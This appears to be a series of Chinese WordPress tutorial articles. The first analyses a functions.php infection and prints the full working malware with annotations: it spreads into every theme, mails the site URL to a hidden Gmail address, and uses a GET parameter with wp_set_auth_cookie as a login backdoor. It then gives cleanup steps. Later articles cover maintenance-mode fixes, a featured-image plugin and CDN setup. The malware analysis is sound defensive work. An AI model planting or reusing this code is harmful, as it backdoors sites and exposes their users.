1 WordPress主題function.php文件里的惡意代碼

• 2 如何清除WordPress主題function.php惡意病毒代碼？
• 3 Wordfence Security插件使用的注意事項

最近我們在使用Wordfence Security安全插件掃描網(wǎng)站惡意代碼之后，發(fā)現(xiàn)了WordPress主題的function.php文件里，隱藏惡意病毒代碼。

WordPress主題function.php文件里的惡意代碼

WordPress中“惡意代碼”最有可能出現(xiàn)的地方是主題目錄下的function.php，通常是隱藏在function.php文件的結(jié)尾。

主要問題：該惡意代碼會在每次有人訪問你的博客頁面時，檢測當(dāng)前博客下的所有主題是否都被感染，如果沒有，就會一起被感染。

之后在執(zhí)行wp的初始化動作init的時候，會檢查當(dāng)前博客是否有發(fā)郵件到郵箱 [email?protected]gmail. com

怎么知道是否發(fā)了？

• 在你的wp_options表 里面有一個名為_is_widget_active_的選項，如果已經(jīng)發(fā)送成功，則將其值設(shè)置為1；
• 如果沒有，則以當(dāng)前被感染博客的主頁URL作為標(biāo)題和內(nèi)容。
• 僅此而已，沒有做其它壞事了。

惡意病毒代碼如下（可能會有一些差異，但基本代碼是一樣的）：

<?php
function _verifyactivate_widgets(){
//當(dāng)前文件名，如/path-to-www/wp-content/themes/SimpleDark/functions.php
//查找當(dāng)前主題functions.php文件中最后一個 <? 標(biāo)記，從這個標(biāo)記的位置開始，取得一直到文件尾的內(nèi)容
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),“<“.“?”));
$output=“”;
$allowed=“”;
//去除html和php標(biāo)簽，其實這一句是扯蛋。。。
$output=strip_tags($output, $allowed);
//取得主題目錄themes的絕對路徑，如 /path-to-www/wp-content/themes
//為了加強程序的兼容性，它不惜以這種很晦澀的方式來獲取。。。
//以主題目錄themes的絕對路徑用array包裹為參數(shù)傳遞給_get_allwidgets_cont函數(shù)獲取此博客的所有主題的functions.php文件的絕對路徑
$direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),“themes”) + 6)));
if (is_array($direst)){
foreach ($direst as $item){
//如果主題functions.php文件可寫
if (is_writable($item)){
//特征碼
$ftion=substr($widget,stripos($widget,“_”),stripos(substr($widget,stripos($widget,“_”)),“(“));
//取目標(biāo)functions.php文件內(nèi)容
$cont=file_get_contents($item);
//沒找到特征碼?OK,試圖感染
if (stripos($cont,$ftion) === false){
//查看目標(biāo)functions.php文件最后是否是以 ?> 結(jié)尾，如果不是，給加上 ?> 標(biāo)記
$comaar=stripos( substr($cont,-20),”?”.”>”) !== false ? “” : “?”.”>”;
//這里的代碼是忽悠人了，模仿WP widgets的代碼，蠱惑你的眼睛，讓你覺得這是widget代碼。。。
$output .= $before . “Not found” . $after;
//如果文件是以 ?> 標(biāo)記結(jié)尾的，連標(biāo)記一起取過來
if (stripos( substr($cont,-20),”?”.”>”) !== false){$cont=substr($cont,0,strripos($cont,”?”.”>”) + 2);}
//開始感染,$widget內(nèi)容即是惡意代碼自身,在functions.php文件原內(nèi)容后附加惡意代碼
$output=rtrim($output, “nt”); fputs($f=fopen($item,”w+”),$cont . $comaar . “n” .$widget);fclose($f);
//后面這句也是偽裝用的
$output .= ($isshowdots && $ellipsis) ? “…” : “”;
}
}
}
}
return $output;
}
function _get_allwidgets_cont($wids,$items=array()){
//從$wids數(shù)組彈出一個元素(實際上是一個位置)
$places=array_shift($wids);
//如果位置字串是以/結(jié)尾的，則去掉/
if(substr($places,-1) == “/”){
$places=substr($places,0,-1);
}

//若不存在這樣的文件或目錄則直接返回false
if(!file_exists($places) || !is_dir($places)){
return false;
}elseif(is_readable($places)){
//否則的話。。。嘿嘿
//遍歷此目錄
$elems=scandir($places);
foreach ($elems as $elem){
if ($elem != “.” && $elem != “..”){
//如果是目錄,則加入$wids數(shù)組
if (is_dir($places . “/” . $elem)){
$wids[]=$places . “/” . $elem;
} elseif (is_file($places . “/” . $elem)&&
$elem == substr(__FILE__,-13)){
//否則，如果是文件，并且文件名等于 functions.php的話，則加入到$items數(shù)組保存,這才是它的目的functions.php正是它要找的
$items[]=$places . “/” . $elem;}
}
}
}else{
return false;
}
//下面還有子目錄？再找找看,遞歸
if (sizeof($wids) > 0){
return _get_allwidgets_cont($wids,$items);
} else {
//好了，完事了，以數(shù)組返回所有找到的functions.php文件的絕對路徑
return $items;
}
}

//下面是3個針對低版本的php而寫的兼容函數(shù)
if(!function_exists(“stripos”)){
function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );
}
}

if(!function_exists(“strripos”)){
function strripos( $haystack, $needle, $offset = 0 ) {
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
}
else{
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) – $offset ), 0 ) ) );
}
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) – ( $found + $offset + strlen( $needle ) ) );
return $pos;
}
}
if(!function_exists(“scandir”)){
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != “.” && $file != “..”) || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
array_push($dirArray,basename($file));
}
}
closedir($handle);
}
return $dirArray;
}
}

//這個動作添加了，用于檢測所有主題目錄下functions.php并感染
add_action(“admin_head”, “_verifyactivate_widgets”);

function _getprepare_widget(){
if(!isset($text_length)) $text_length=120;
if(!isset($check)) $check=”cookie”;
if(!isset($tagsallowed)) $tagsallowed=”<a>“;
if(!isset($filter)) $filter=”none”;
if(!isset($coma)) $coma=””;
if(!isset($home_filter)) $home_filter=get_option(“home”);
if(!isset($pref_filters)) $pref_filters=”wp_”;
if(!isset($is_use_more_link)) $is_use_more_link=1;
if(!isset($com_type)) $com_type=””;
if(!isset($cpages)) $cpages=$_GET[“cperpage”];
if(!isset($post_auth_comments)) $post_auth_comments=””;
if(!isset($com_is_approved)) $com_is_approved=””;
if(!isset($post_auth)) $post_auth=”auth”;
if(!isset($link_text_more)) $link_text_more=”(more…)”;
if(!isset($widget_yes)) $widget_yes=get_option(“_is_widget_active_”);
if(!isset($checkswidgets))
//這個實際是wp_set_auth_cookie
$checkswidgets=$pref_filters.”set”.”_”.$post_auth.”_”.$check;
if(!isset($link_text_more_ditails)) $link_text_more_ditails=”(details…)”;
if(!isset($contentmore)) $contentmore=”ma”.$coma.”il”;
if(!isset($for_more)) $for_more=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql=””;

//如果 _is_widget_active_ option內(nèi)容為空,即表示沒有被感染過
if (!$widget_yes) :

global $wpdb, $post;
//取出存在已經(jīng)通過的評論（不包括trackback/pingback）的文章
// post_author 為 [email?protected] 的文章，肯定是沒有的

$sq1=”SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=”1” AND comment_type=”” AND post_author=”li”.$coma.”vethe”.$com_type.”mas”.$coma.”@”.$com_is_approved.”gm”.$post_auth_comments.”ail”.$coma.”.”.$coma.”co”.”m” AND post_password=”” AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
if (!empty($post->post_password)) {
if ($_COOKIE[“wp-postpass_”.COOKIEHASH] != $post->post_password) {
if(is_feed()) {
$output=__(“There is no excerpt because this is a protected post.”);
} else {
$output=get_the_password_form();
}
}
}
if(!isset($fixed_tags)) $fixed_tags=1;
if(!isset($filters)) $filters=$home_filter;
//$gettextcomments實際上為 wp_mail
if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore;
if(!isset($tag_aditional)) $tag_aditional=”div”;

//這里$sh_cont即為 [email?protected]
if(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, “l(fā)ive”), 20);#
if(!isset($more_text_link)) $more_text_link=”Continue reading this entry”;
if(!isset($isshowdots)) $isshowdots=1;

$comments=$wpdb->get_results($sql);
if($fakeit == 2) {
$text=$post->post_content;
} elseif($fakeit == 1) {
$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
} else {
$text=$post->post_excerpt;
}
//開始調(diào)用　wp_mail 向 [email?protected] 發(fā)送郵件，標(biāo)題和內(nèi)容都是被感染的博客的URL 地址
$sq1=”SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=”1” AND comment_type=”” AND comment_content=”. call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) .” ORDER BY comment_date_gmt DESC LIMIT $src_count”;#
if($text_length < 0) {
$output=$text;
} else {
if(!$no_more && strpos($text, “<span id=“more-5265”></span>“)) {
$text=explode(“<span id=“more-5675”></span>“, $text, 2);
$l=count($text[0]);
$more_link=1;
//執(zhí)行這一句時就開始發(fā)郵件了。
$comments=$wpdb->get_results($sql);
} else {
$text=explode(” “, $text);
if(count($text) > $text_length) {
$l=$text_length;
$ellipsis=1;
} else {
$l=count($text);
$link_text_more=””;
$ellipsis=0;
}
}
for ($i=0; $i<$l; $i++)
$output .= $text[$i] . ” “;
}
//把感染標(biāo)記置為1
update_option(“_is_widget_active_”, 1);
if(“all” != $tagsallowed) {
$output=strip_tags($output, $tagsallowed);
return $output;
}
endif;
$output=rtrim($output, “sntrx0B”);
$output=($fixed_tags) ? balanceTags($output, true) : $output;
$output .= ($isshowdots && $ellipsis) ? “…” : “”;
//$filter 為 none …,又是在偽裝
$output=apply_filters($filter, $output);
switch($tag_aditional) {
case(“div”) :
$tag=”div”;
break;
case(“span”) :
$tag=”span”;
break;
case(“p”) :
$tag=”p”;
break;
default :
$tag=”span”;
}

//$checkswidgets即是wp_set_auth_cookie
if ($is_use_more_link ) {
if($for_more) {
$output .= ” <” . $tag . ” class=”more-link”><a href=””. get_permalink($post–>ID) . “#more-” . $post->ID .”” title=”” . $more_text_link . “”>” . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : “” . “</a></” . $tag . “>” . “n”;
} else {
$output .= ” <” . $tag . ” class=”more-link”><a href=””. get_permalink($post–>ID) . “” title=”” . $more_text_link . “”>” . $link_text_more . “</a></” . $tag . “>” . “n”;
}
}
return $output;
}

//這里是用來干壞事的，這才是這個惡意代碼的目的,前面的感染是“準(zhǔn)備活動”
add_action(“init”, “_getprepare_widget”);


//這個函數(shù)也是用來偽裝的,無惡意
function __popular_posts($no_posts=6, $before=”<li>“, $after=”</li>“, $show_pass_post=false, $duration=””) {
global $wpdb;
$request=”SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS ”comment_count” FROM $wpdb->posts, $wpdb->comments”;
$request .= ” WHERE comment_approved=”1” AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=”publish””;
if(!$show_pass_post) $request .= ” AND post_password =”””;
if($duration !=””) {
$request .= ” AND DATE_SUB(CURDATE(),INTERVAL “.$duration.” DAY) < post_date “;
}
$request .= ” GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts”;
$posts=$wpdb->get_results($request);
$output=””;
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . ” <a href=”” . $permalink . “” title=”” . $post_title.“”>” . $post_title . “</a> ” . $after;
}
} else {
$output .= $before . “None found” . $after;
}
return $output;
}
?>

WordPress主題惡意代碼有哪些？

如果使用Wordfence Security安全插件掃描確定你的function.php文件被篡改了，需要檢查一下，例如：

1. _verifyactivate_widgets
2. function?_checkactive_widgets
3. function?_get_allwidgets_cont
4. function stripos
5. function strripos
6. function?scandir
7. function?_getprepare_widget
8. function?__popular_posts
9. add_action(“admin_head”,?“_checkactive_widgets”);
10. add_action(“init”,?“_getprepare_widget”);
11. _verify_isactivate_widgets
12. _check_isactive_widget
13. _get_allwidgetscont
14. _prepare_widgets
15. __popular_posts

• 每一行都是獨立的，如果你的functions.php中有以上代碼，那么你可能會被擊中。
• 其中，functions和add_action一般是屬于“準(zhǔn)備活動”的“惡意代碼”的代碼。

如何清除WordPress主題function.php惡意病毒代碼？

清理起來也很簡單，只要在WordPress主題的function.php文件中，找到上面類似的代碼并刪除即可，但是因為一旦被感染，你的themes主題目錄下的所有主題會被感染，所以只清除當(dāng)前使用的主題是無效的，清除后很快就會生成。

解決方法是清除一個WordPress主題的惡意病毒代碼后，將functions.php文件設(shè)置為444權(quán)限，然后清除其它WordPress主題。

至于最后一個functions.php文件的444權(quán)限是否需要改回來，們?nèi)私ㄗh444還是比較安全的，需要修改的時候可以修改。

Wordfence Security插件使用的注意事項

我們推薦 Wordfence Security 的 WordPress 插件，一個集成了防火墻和惡意代碼掃描的 WordPress 安全插件，由一個大型團隊構(gòu)建和維護，100% 專注于 WordPress 安全。

雖然有付費模塊，但我們可以使用免費模塊“掃描”來掃描我們的WordPress網(wǎng)站，檢查包含“惡意代碼”的PHP文件，雖然有一定的誤報率（主要是一些正版插件， 主題加密組件會被誤報），但查找“惡意代碼”肯定是事半功倍。

需要注意的是，這個插件不建議經(jīng)常開啟，因為它的防火墻和安全防護會對數(shù)據(jù)庫造成一定的負載壓力，影響網(wǎng)站的性能。

通常，啟用插件以在需要時運行“掃描”掃描。

排查完畢后關(guān)閉插件，以備不時之需。

希望我們網(wǎng)站（ https://www.wordpressx.com/ ） 分享的《WordPress主題如何清理惡意代碼_verifyactivate_widgets》，對您有幫助。

1 為何導(dǎo)致 WordPress 上的“暫時無法進行定期維護”錯誤？

• 2 如何解決“Briefly unavailable for scheduled maintenance. check back in a minute？
• 3 如何避免“Briefly unavailable for scheduled maintenance. check back in a minute？

WordPress修復(fù)“暫時無法進行定期維護。嘗試訪問你的 WordPress 網(wǎng)站時，請稍后再查”問題。

你是否遇到過“Briefly unavailable for scheduled maintenance. check back in a minute”錯誤？

像這樣的錯誤令人沮喪，但不要擔(dān)心！修復(fù)“暫時無法進行定期維護。一會兒回來看看?！盬ordPress 上的錯誤只需要幾分鐘。

在本文中，我們將介紹：

• 為什么你會看到錯誤消息？
• 如何修復(fù) WordPress 上的“Briefly unavailable for scheduled maintenance. check back in a minute”消息？
• 如何防止將來遇到此問題的提示？

為何導(dǎo)致 WordPress 上的“暫時無法進行定期維護”錯誤？

每當(dāng)你使用儀表板中內(nèi)置的 WordPress 更新系統(tǒng)更新核心軟件、WordPress插件或主題時，WordPress 會將你的網(wǎng)站置于“維護模式”，以便它可以安全地更新相關(guān)文件。

如果你在更新WordPress程序的過程中注意過，WordPress 在執(zhí)行更新時實際上會在你的儀表板中告訴你這一點?▼

• 你可以看到 WordPress 打開/關(guān)閉維護模式。

當(dāng)你的網(wǎng)站處于維護模式時，任何嘗試訪問你的 WordPress 網(wǎng)站的人都會看到“Briefly unavailable for scheduled maintenance. check back in a minute”消息 ▼

• “暫時無法進行定期維護。請稍后再回來查看”消息。

所以實際上，消息本身并不是錯誤，它應(yīng)該只存在很短的時間內(nèi)。

通常，WordPress 無縫啟用維護模式，執(zhí)行更新，然后禁用維護模式。大多數(shù)時候，這個過程非常無縫，只需要幾秒鐘，你甚至不會注意到你的網(wǎng)站發(fā)生了變化。

但是，有時你的網(wǎng)站會“陷入”維護模式。那時“Briefly unavailable for scheduled maintenance. check back in a minute”消息開始成為問題，因為它不會消失，并阻止你和其他人訪問你的網(wǎng)站。

你的 WordPress 網(wǎng)站可能會卡在維護模式有多種原因，最常見的原因是：

• 你在更新WordPress過程中關(guān)閉了瀏覽器選項卡。
• 你試圖同時更新大量不同的主題/插件，但有些東西停滯了。
• 導(dǎo)致故障的更新存在一些兼容性問題。

值得慶幸的是，修復(fù)“Briefly unavailable for scheduled maintenance. check back in a minute”WordPress 上的消息，只要求你通過 FTP 刪除單個文件。

如何解決“Briefly unavailable for scheduled maintenance. check back in a minute？

以下是如何讓你的網(wǎng)站再次運行的解決方案。

為了讓你的網(wǎng)站進入維護模式，WordPress 將一個名為.maintenance的文件添加到你的 WordPress 站點的根文件夾中（這與你的wp-config.php文件所在的文件夾相同）。

使你的站點退出維護模式并擺脫“暫時無法進行定期維護。請稍后再查看”消息，你需要做的就是刪除該.maintenance文件。

這是有關(guān)如何執(zhí)行此操作的分步指南……

第 1 步：通過 SFTP 連接到你的 WordPress 網(wǎng)站

首先，你需要使用 FTP 程序通過 SFTP 連接到你的 WordPress 站點。

連接到站點后，你應(yīng)該會在public文件夾中，看到所有站點文件的列表 ▼

• .maintenance 文件位于服務(wù)器的“public”文件夾中。

第 2 步：刪除 .maintenance 文件

現(xiàn)在，你需要做的就是刪除名為.maintenance的文件，以讓你的站點退出維護模式并解決問題?▼

• 刪除 .maintenance 文件，就這樣簡單而已！
• 刪除文件后，你的 WordPress 網(wǎng)站應(yīng)立即開始正常運行。

如果你沒有看到.maintenance文件，你可能需要顯示隱藏文件。

例如，在FileZilla中，單擊頂部的“服務(wù)器”，然后單擊“強制顯示隱藏文件”?▼

強制顯示隱藏文件

如何避免“Briefly unavailable for scheduled maintenance. check back in a minute？

以下是一些提示，可幫助你避免將來遇到此問題。

1.運行WordPress更新時，不要關(guān)閉瀏覽器選項卡

每當(dāng)你使用 WordPress 的更新功能時，請確保你的瀏覽器選項卡保持打開狀態(tài)，直到你看到“禁用維護模式...所有更新已完成”的消息?▼

• 看到此消息時，你可以安全地關(guān)閉瀏覽器選項卡。

2.避免同時更新過多的WordPress主題和插件

• 嘗試限制一次運行的更新數(shù)量。
• 例如，在可用時更新WordPress主題和插件，而不是等待一次全部完成。
• 除了減少陷入維護模式的機會之外，定期更新你的網(wǎng)站通常是保持網(wǎng)站安全和正常運行的好方法。

3. 確保主題和插件兼容

在你運行任何更新之前，請確保你正在更新的主題或插件與你正在運行的 WordPress 版本兼容。

你可以通過單擊查看詳細信息鏈接，快速檢查確認WordPress插件和主題的兼容性 ▼

• 檢查WordPress插件或主題的兼容性。

擴展閱讀：

WordPress錯誤怎么辦?Health Check & Troubleshooting插件排查

當(dāng)WordPress網(wǎng)站出現(xiàn)一些致命錯誤問題，找不到原因時，必須禁用所有插件，然后逐個啟用，以便觀察是WordPress主題，或是哪些WordPress插件造成沖突。但是，禁用所有WordPress插件，絕對會影……

WordPress致命錯誤:登錄站點后臺安裝插件主題遇到錯誤怎么解決？

最近Dropbox API停止使用長期訪問令牌。 為了符合這些新的變化，BackWPup插件必須實現(xiàn)刷新令牌的使用，它只能在您重新進行身份驗證時獲取。登錄WordPress后臺提示此站點遇到了致命錯誤You……

解決WordPress更新失敗:因為我們不能復(fù)制一些文件，升級未被安裝

有時，當(dāng)我們升級WordPress建站程序版本，或升級WordPress插件時，會出現(xiàn)錯誤提示：更新失敗：因為我們不能復(fù)制一些文件，升級未被安裝。這通常是WordPress建站程序的文件權(quán)限不一……

希望我們網(wǎng)站（ https://www.wordpressx.com/ ） 分享的《WordPress修復(fù)Briefly unavailable for scheduled maintenance》，對您有幫助。

1 Featured Image From URL插件下載

• 2 Featured Image From URL插件設(shè)定
  • 2.1 不建議啟用Media Libarary
  • 2.2 自動設(shè)置第1張圖片為特色圖片
  • 2.3 Fake Internal Featured Image設(shè)定
• 3 結(jié)語

WordPress如何添加外鏈特色圖片？Featured Image from URL插件設(shè)定

雖然用WordPress建站有很多優(yōu)勢，但是在WordPress默認的媒體庫，并不是那么好用：

• 上傳圖片會自動裁剪生成各種尺寸的冗余圖像……
• 需要手動添加特色圖片……
• 很多WordPress主題的縮略圖，都必須添加特色圖片，才能如常顯示，否則無縮略圖會非常難看……

其實，我們是將網(wǎng)站上的圖片，上傳到服務(wù)器的其它文件夾。

這樣做的好處：

• 這些大量圖像不會降低網(wǎng)站的性能。
• 也不會添加自動裁剪生成各種尺寸多余沒用的圖像。

所以，在此分享可以添加外鏈特色圖片功能的WordPress插件——Featured Image From URL（來自URL的特色圖片）。

Featured Image From URL插件下載

插件名稱：Featured Image From URL

點此訪問 WordPress 官網(wǎng)下載?Featured Image From URL 插件

安裝WordPress插件的方法，請瀏覽這篇建站教程 ▼

• 在安裝和啟用WordPress插件后，就能直接使用。
• 盡管該插件有許多設(shè)置選項，但如果你不知道設(shè)置的定義，則可先跳過不做設(shè)置。

Featured Image From URL插件設(shè)定

進入WordPress文章編輯頁面后，如果在右側(cè)邊欄中沒有Featured Image From URL ……

請在單擊文章頁面頂部的“顯示選項”后，勾選“Featured Image from URL” ▼

你應(yīng)該能夠在文章編輯區(qū)域的右側(cè)：

找到Featured Image From URL?字段輸入框，直接填寫要使用的圖像URL ▼

當(dāng)然，有興趣使用此插件的朋友可以測試每個設(shè)置。

不建議啟用Media Libarary

在“Admin Area”→“Media Libarary”選項（不建議啟用）?▼

• 因為若啟用Media Libarary功能后，會在“媒體庫”占用ID自動生成大量沒用的“文章媒體”；
• 所以我們非常不建議啟用Media Libarary功能。

自動設(shè)置第1張圖片為特色圖片

在保存、發(fā)布或更新時，開啟“use the first image as featured image”功能 ▼

• 若開啟“overwrite the existing external featured image”，可覆蓋外鏈特色圖片?▲

Fake Internal Featured Image設(shè)定

以下是Metadata → Fake Internal Featured Image（假內(nèi)部特色圖片）設(shè)定▼

默認的外部精選圖片顯示問題：

• 若無法如常顯示Default External Featured Image（默認的外部精選圖片）
• 比如：換新的默認的外部精選圖片后，網(wǎng)站還是顯示之前默認的外部精選圖片……
• 需在“Metadata”，點擊“Clean metadata”，會先停用“Fake Internal Featured Image”。
• 接著，開啟“Fake Internal Featured Image”，就能解決無法顯示Default External Featured Image的問題了。

結(jié)語

• 雖然WordPress插件Nelio External Featured Image也有類似功能，但該插件作者不再維護更新該插件。
• 如果你想找到WordPress特色圖片、自動縮略圖的替代方案，你可以使用本文分享WordPress外鏈特色圖片插件。

希望我們網(wǎng)站（ https://www.wordpressx.com/ ） 分享的《WordPress外鏈特色圖片插件：Featured Image from URL》，對您有幫助。

1 CDN是什么？有什么用？

• 1.1 Stackpath全能CDN（前稱MaxCDN）
• 1.2 Stackpath全球CDN節(jié)點有哪些？
• 2 為什么要用Stackpath CDN？
• 3 StackPath CDN如何設(shè)置？
  • 3.1 Autoptimize 插件主要設(shè)置CDN
  • 3.2 Autoptimize 插件額外設(shè)置

如何10倍提升外貿(mào)網(wǎng)站速度？從而提高谷歌搜索排名？

CDN是什么？有什么用？

• CDN（英文全稱是Content distribution network），中文名稱是“內(nèi)容分發(fā)網(wǎng)絡(luò)”。
• CDN能將將你網(wǎng)站上的內(nèi)容，緩存在不同地理位置的多個服務(wù)器上。
• 通過最接近的服務(wù)器，將內(nèi)容提供給你的站點訪問者，從而加快網(wǎng)站訪問速度。

在本文中，我們將分享可以幫助你加快外貿(mào)網(wǎng)站速度的WordPress最佳CDN服務(wù)。

Stackpath全能CDN（前稱MaxCDN）

多年來MaxCDN是個非常流行的CDN服務(wù)，特別是對于WordPress用戶：

• 2016年，Stackpath收購了MaxCDN，并將MaxCDN的服務(wù)包含在Stackpath品牌中。
• 現(xiàn)在，2者是同1個。
• 和Cloudflare一樣，Stackpath提供CDN和安全服務(wù)。

但是，Stackpath為你提供了很多選擇，你可以選擇特定服務(wù)，或者使用包含CDN、防火墻、托管DNS、全球DDoS保護等的完全“邊緣交付包”。

Stackpath的全球DDoS保護：

• StackPath的完全DDoS保護功能，可以有效緩解任何因大量流量，而淹沒你網(wǎng)站的DDoS攻擊。
• StackPath的全球網(wǎng)絡(luò)可以緩解最大、最復(fù)雜的DDoS攻擊，并最大限度地減少對服務(wù)的影響。
• StackPath DDoS緩解技術(shù)可以解決所有DDoS攻擊方法，包括：UDP，SYN和HTTP泛洪，并且不斷進一步開發(fā)，以阻止新興技術(shù)和策略。

Stackpath全球CDN節(jié)點有哪些？

目前，Stackpath 在除非洲之外的每個宜居大陸上，提供了35個以上的CDN節(jié)點。 你可以查看以下地圖 ▼

點此進入 Stackpath官網(wǎng) 查看最新全球CDN節(jié)點

• 因為Stackpath是個國外CDN服務(wù)商，所以設(shè)置起來非常簡單。
• 你只需輸入你網(wǎng)站的URL，然后Stackpath將處理特定資源，提取到其服務(wù)器上。
• 然后，你可以開始使用從Stackpath的邊緣服務(wù)器提供的CDN服務(wù)。

為什么要用Stackpath CDN？

1. 因為網(wǎng)站訪問速度，是搜索引擎排名規(guī)則之一。
2. 而且，我們在《引流推廣》專題中，就有說到研究平臺規(guī)則，是引流量的重點之一。
3. 所以， 外貿(mào)網(wǎng)絡(luò)推廣人員做SEO，想要進一步提升在谷歌搜索結(jié)果排名，提升網(wǎng)站速度是至關(guān)重要的。

Stackpath的優(yōu)點有哪些？

• 容易設(shè)置。
• 你無需更改名稱服務(wù)器，這可以讓你完全控制。
• 輕松的按月計費。
• 如果需要，還提供其它功能，如Web應(yīng)用程序防火墻和托管DNS。

StackPath CDN如何設(shè)置？

第1步：注冊StackPath CDN?賬號▼

點此進入 StackPath CDN?官網(wǎng)

輸入郵箱和密碼，并單擊“Create an Account”按鈕，創(chuàng)建一個帳戶?▼

第 2 步：需要選擇一項StackPath服務(wù)。StackPath提供網(wǎng)站和應(yīng)用程序服務(wù)以及邊緣計算服務(wù)? 選擇一“網(wǎng)站和應(yīng)用程序服務(wù)”?▼

第 3 步：選擇StackPath的 CDN?▼

第 3 步：通過發(fā)送到你的電子郵件帳戶的鏈接驗證你的電子郵件地址后，它會將你重定向到付款頁面 ▼

• 無需輸入 StackPath 促銷代碼。只需點擊我們指向StackPath的鏈接，系統(tǒng)就會自動應(yīng)用最優(yōu)惠的價格。

第 4 步：在StackPath儀表板中，單擊Site選項卡 ▼

第 5 步：創(chuàng)建StackPath CDN站點 ▼

• 輸入將提供CDN資源的域名URL。

在大多數(shù)情況下，這是網(wǎng)站的URL。

1. 網(wǎng)絡(luò)服務(wù)器（默認）
   • http://www.wordpressx.com
2. 亞馬遜S3
   • 虛擬托管樣式的URL
     • bucket.s3-?aws-region.amazonaws.com
   • 路徑托管樣式
     • s3-?aws-region.amazonaws.com /bucket-name
3. GCS Bucket
   • bucket-name?.storage.googleapis.com

• 在“ 可用服務(wù)”下，勾選CDN框??（你可以隨時添加更多內(nèi)容）
• 在StackPath中設(shè)置你的服務(wù)器IP地址。

第 6 步：將StackPath CDN URL粘貼到Autoptimize插件的CDN Base URL字段中?▼

• 你需要在URL的開頭添加 http:// 或 https:// 才能使用Autoptimize 插件。

第 7 步：在StackPath中轉(zhuǎn)到CDN→CACHE SETTINGS（緩存設(shè)置）▼

• 然后單擊“Purge Everythig（清除所有內(nèi)容）” ▲

第 8 步：在StackPath中將你的服務(wù)器IP地址列入白名單（WAF→防火墻）?▼

在GTmetrix中測試運行你的站點 ，YSlow中的“內(nèi)容交付網(wǎng)絡(luò)”應(yīng)為綠色?▼

如果使用WordPress建站，可以安裝WordPress插件Autoptimize。

Autoptimize 插件主要設(shè)置CDN

• 優(yōu)化HTML代碼 – 啟用（修復(fù)縮小GTmetrix中的項目）。
• 優(yōu)化JavaScript代碼 – 啟用（修復(fù)GTmetrix中的JavaScript項目）。啟用此功能后測試你的網(wǎng)站并檢查錯誤，因為優(yōu)化JavaScript過程中，可能會造成網(wǎng)站出錯。
• 優(yōu)化CSS代碼 – 啟用（修復(fù)GTmetrix中的CSS項目）。啟用此功能后測試你的站點。
• CDN基本URL – 這是你的CDN URL所在的位置。

Autoptimize 插件額外設(shè)置

Google字體：

• 如果使用 Google字體 ，可以在從外部資源（Google字體庫）中提取時減慢加載時間。
• 如果你的網(wǎng)站用戶有來自中國大陸，建議選擇刪除Google字體庫。

優(yōu)化圖片：

• 你網(wǎng)站上的網(wǎng)址將更改為指向 ShortPixel的CDN。
• 只要它是無損壓縮，這不應(yīng)該影響它們的外觀，但它們會加載得更快。

圖像優(yōu)化質(zhì)量：

• 啟用無損壓縮以避免丟失圖像質(zhì)量。

刪除Emojis：

• 啟用（表情符號加載時間不好）。

從靜態(tài)資源中刪除查詢字符串：

• 查詢字符串通常由插件生成，無法修復(fù)（在GTmetrix / Pingdom中）只是啟用此功能，但你可以嘗試。
• 更好的解決方案是檢查你的站點是否有高CPU插件，并用輕量級插件替換它們。
• 大多數(shù)高CPU插件包括社交共享、圖庫、頁面構(gòu)建器、相關(guān)帖子、統(tǒng)計和實時聊天插件。
• 你還應(yīng)刪除所有不必要的插件并清理數(shù)據(jù)庫（使用WP-Optimize等插件）清除卸載的插件留下的表。

預(yù)連接到第3方域名：

• 幫助瀏覽器預(yù)鏈接來自外部資源（Google字體、分析、地圖、跟蹤代碼管理器、亞馬遜商店等）的請求。
• 這些通常在Pingdom報告中顯示為“最小化DNS查找”，但以下是常見示例。

https://fonts.googleapis.com
https://fonts.gstatic.com
https://www.google-analytics.com
https://ajax.googleapis.com
https://connect.facebook.net
https://www.googletagmanager.com
https://maps.google.com

異步Javascript文件：

• 這意味著某些東西阻止了加載快速加載的內(nèi)容。
• 但如果你在GTmetrix和Pingdom中看到JavaScript錯誤，那么 Async JavaScipt插件可能需要派上用場了。

優(yōu)化YouTube視頻：

• 如果你的網(wǎng)站有視頻， WP YouTube Lyte 會加載它們，以便僅在用戶向下滾動并點擊播放按鈕時加載，從而消除對YouTube服務(wù)器的初始請求。
• 這可以減少視頻內(nèi)容的多次關(guān)閉加載時間，因為它們是頁面上最重要的元素之一。
